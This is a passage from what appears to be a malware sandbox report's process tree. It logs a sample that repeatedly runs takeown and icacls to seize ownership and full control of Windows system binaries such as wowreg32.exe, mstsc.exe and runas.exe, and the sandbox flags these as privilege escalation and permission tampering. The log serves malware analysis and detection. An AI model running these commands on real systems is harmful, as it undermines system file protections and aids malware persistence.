- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2828
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1688
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2268
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2296
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4104
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:436
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:548
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:976
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3008
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4508
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4660
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1188
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:4720
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4616
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2800
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:968
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4164
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2996
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2220
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2404
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:3384
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3448
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2540
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:832
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:672
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4620
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2836
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3256
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4908
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4560
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4588
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4764
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3088
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1572
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3408
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:552
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3740
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3024
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1360
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5040
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2044
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4768
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3128
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1856
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3320
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2576
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1376
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1432
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:884
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3120
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1452
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:2528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4068
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:1408
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3960
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3832
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4224
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3844
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4836
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3668
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4604
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4808
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4796
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:32
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3548
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3444
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3864
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4620
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2988
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5096 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2404
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:1996
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4892
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2800
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2172 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4164
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2420
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:1476
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2540
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4652
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3008
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3828
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5228
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5364
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5520
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5568
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5596
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5612
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5684
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5692
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5716
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5724
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5732
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5824
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5968
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6012
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:6124
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2836
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:720
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4540
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:2020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2416
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3276
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2688
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:4144
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2440
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:428
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4908
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4404
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2824
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5984
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1856
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4888
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3648
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4068
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1860
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4660
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2496
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2472
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1360
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1976
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5384
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2264
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3976
-
-
